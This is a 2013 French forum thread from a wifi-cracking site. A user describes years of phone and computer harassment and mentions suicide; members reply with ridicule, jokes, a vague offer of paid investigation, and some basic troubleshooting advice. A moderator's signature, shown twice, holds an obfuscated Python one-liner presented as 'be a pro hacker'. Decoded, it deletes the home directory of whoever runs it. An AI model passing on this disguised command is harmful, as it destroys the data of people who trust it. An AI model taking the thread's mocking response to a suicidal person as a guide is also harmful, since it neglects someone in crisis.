Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-08-2013 20:30:50

xavolas77
N00b

telephone hacker - vie détruite

Bonjour,

j'écris ce mail pour avoir des réponses mais sachez avant tout que je suis un homme détruit par ce que je vie...

Il y a près de 3 ans que je suis victime d'un "hacker" qui au début avait commencé a détourné mon propre numéro de téléphone mobile pour m'envoyer des sms ( pour être plus claire il utilisait mon propre numéro pour me harceler, me menacer, me faire du chantage ), ensuite il est passé sur le téléphone mobile de ma compagne. il utilise son numéro pour y effectuer les mêmes agissements. et je ne sais vraiment pas comment il fait ! qui plus est, j'ai beau changer de numéro de téléphone, systématiquement il le (re)trouve. il fait tout cela à distance , c'est un cauchemar... qui plus est il fait la même chose avec ma boite mail.. boite mail que j'ai changé plus de20 fois.. il a piraté mon ordinateur, il sait et voit tout ce que je fais sur mon ordi... aujourd'hui, nous sommes terrorisés car il s'introduit chez nous alors même que bous changeons de barillet a chaque fois. je vie un enfer, un calvaire, la police n'a rien pu faire, croyant meme que c'était ma compagne qui agissait de la sorte.. notre vie est détruite car la justice a abandonné faute de preuve soit disant. cet individu manipule tout, et nous savons plus quoi faire, hormis peut etre le suicide pour moi.. j'ai besoin de réponse de la part de vrai informaticiens, limite hacker ou hacker tout court, me dire comment cela peut etre possible.. svp nous avons besin de votre aide, je vous en conjure.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-08-2013 20:50:43

Furyo
Membre Irremplaçable
Site Web

Re : telephone hacker - vie détruite

xavolas77 a écrit :

Bonjour,

j'écris ce mail pour avoir des réponses mais sachez avant tout que je suis un homme détruit par ce que je vie...

Il y a près de 3 ans que je suis victime d'un "hacker" qui au début avait commencé a détourné mon propre numéro de téléphone mobile pour m'envoyer des sms ( pour être plus claire il utilisait mon propre numéro pour me harceler, me menacer, me faire du chantage ), ensuite il est passé sur le téléphone mobile de ma compagne. il utilise son numéro pour y effectuer les mêmes agissements. et je ne sais vraiment pas comment il fait ! qui plus est, j'ai beau changer de numéro de téléphone, systématiquement il le (re)trouve. il fait tout cela à distance , c'est un cauchemar... qui plus est il fait la même chose avec ma boite mail.. boite mail que j'ai changé plus de20 fois.. il a piraté mon ordinateur, il sait et voit tout ce que je fais sur mon ordi... aujourd'hui, nous sommes terrorisés car il s'introduit chez nous alors même que bous changeons de barillet a chaque fois. je vie un enfer, un calvaire, la police n'a rien pu faire, croyant meme que c'était ma compagne qui agissait de la sorte.. notre vie est détruite car la justice a abandonné faute de preuve soit disant. cet individu manipule tout, et nous savons plus quoi faire, hormis peut etre le suicide pour moi.. j'ai besoin de réponse de la part de vrai informaticiens, limite hacker ou hacker tout court, me dire comment cela peut etre possible.. svp nous avons besin de votre aide, je vous en conjure.

Bonjour et Bienvenue sur le forum wink

Dans les cas, les plus despéré, il reste toujours une solution, une derniere et unique :

Courage smile

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 21-08-2013 08:04:21

flatounet
Membre V.I.P.

pitoyable sérieux

j'ai moin drole que l'agence tourix big_smile

http://www.pagesjaunes.fr/annuaire/sain … ychologues

au pire si ta pas de thune , va au ccas de ta ville
tu en à des gratuis.....

#4 21-08-2013 08:14:02

spawn
Modérateur

Porte plainte ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 21-08-2013 09:26:33

koala
Membre d'honneur
Lieu : In the sky

SI la justice n'a rien pu trouver et que donc tu es déga aller voir la police as tu essayer avec la gendarmerie? ils ont une cyber équipe plus développer que chez la police.J'ai connu un gendarme qui m'en avait parler c'est pour sa qu je te dis ça.Autrement le fait qu'il te retrouve a chaque fois meme si tu change de carte sim je vois pas trop comment il fait la hmm ta déga changer de carte sim et de portable en meme temps et non séparément? tu utilise des smartphones?  tu es sur que il y a pas un peu de paranoia dans tout ça?

Quand tu navigue sur internet (je suppose que tu es sous windows) tu as déga afficher le gestionnaire de tache pour voir si il y a pas un processus louche? par la meme occasion va voir si le controle a distance est activé sur ta box etau pire fait nous un screen de tout ce qui te parait louche et on triera par élimination ce qui l'ai vraiment ou pas.

#6 22-08-2013 00:24:44

rinzkler
Nouveau membre

Bonsoir, J'ai plusieurs questions à vous posez sur cette affaire:

Combien mettez vous d'argent pour connaître l'identité de votre harcelereur ?

Dans quel région habitez vous ?

Voulez vous qu'une tiers personne s'occupe de votre cas ?

Pour répondre à votre question "Comment il fait cela ?" et bien toutes les méthodes sont bonnes. Un Micro installer chez vous ou encore votre téléphone portable est sous l'emprise d'un programme malicieux. Le plus sage c'est de ne plus utiliser votre ordinateur et votre téléphone pour limiter les dégats. Si vous êtes vraiment pas doué avec la "technologie", vous ne pourrez pas vous défendre.

Donnez aussi le plus d'information possible comme votre modèle de téléphone si il tourne sur android ? Votre ordinateur votre fournisseur d'accès le model de votre box, si le wifi est activé, etc...

#7 22-08-2013 09:13:25

koala
Membre d'honneur
Lieu : In the sky

hum hum...

Combien mettez vous d'argent pour connaître l'identité de votre harcelereur ?
Dans quel région habitez vous ?
Voulez vous qu'une tiers personne s'occupe de votre cas ?

Pourquoi ces questions? (SH) Super Hackeur va voler a son secours contre une somme d'un montant X c'est sa? big_smile

On peut le conseiller, l'aider a y voir plus clair mais en aucun cas régler le problème a sa place et encore moins contre une somme d'argent, raisonnement nul et surtout grotesque.Il doit voir sa avec les autorités sans quoi ça peut se retourner contre lui vu les lois de nos jours...

#8 22-08-2013 11:49:47

spawn
Modérateur

rinzkler à cause du nom de ton mail, au premier pas de travers je te kickban.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#9 22-08-2013 16:52:22

rinzkler
Nouveau membre

@koala: Je pensai plutôt à faire appel à une agence de détective privée mais super hacker à la rescousse ça me va. smile Et d'installer des cameras, micro, etc... Apparement cette personne s'introduit dans le logement de notre posteur initial et les autorités sont inutiles.

@spawn: On ne peut plus choisir son adresse mail de nos jours ?  J'avoue que c'est une boîte pour les spam d'autre domaine/site. C'est suspect mais très franchement je suis pas assez imbécile pour faire du spam ( ni même utiliser une technique avec une adresse qui existe dans le cas où faire du spam dépendrait de sauver des vies humaines. Bien que je ne vois pas comment).

Moi avec le peu d'information que tu donnes. Je ne peux que te conseiller d'utiliser le linux Fedora qui possède des méchanismes de sécurité. Lors de l'intallation tu pourras par exemple chiffré tes données, il pourra être à côté de windows. Les applications possèderont des droits d'accès aux ressources. C'est un des systèmes les plus difficile à détourner.
Ensuite je te conseil de regarder toujours le barre du navigateur si il n'y a aucun https, je peux t'affirmer que les mots de passe que tu envoyes sont récupérables.

#10 22-08-2013 23:52:36

Rapside
Nouveau membre

bonjour,
quelques questions:
-avez vous laissé manipuler chez vous votre matériel informatique à un tiers depuis que l'incident est arrivé?
(un ami?, une connaissance, un voisin bienveillant, un pseudo installateur, réparateur........)
-votre pc est il neuf ou d'occasion?
-votre mode de connection à internet?
-les sécurités mises en place sur votre pc? firewall, antivirus, anti malware.........
-les appli installées sur votre pc? téléchargements?
-vous habitez en location ou êtes vous propriétaire, neuf ou ancien?
-votre gsm, provenance? qui l'a manipulé à part vous?
-quand vous parlez d'intrusion dans votre domicile, traces d'effraction? type de porte, type de barillet?
ça peut paraitre farfelu mais c'est utile de répondre.

rapside

#11 30-08-2013 04:04:25

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne

La meilleure solution c'est d'appeler mamadou ...
mamadou-Ngueye.jpg

« γνωθι σεαυτον »

#12 30-08-2013 08:31:32

spawn
Modérateur

Cette discussion ne menant à rien de sérieux, je choisis unilatéralement de la fermer, jusqu'au message de présentation de xavolas77

@9b0ae3c4 méric.fr

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]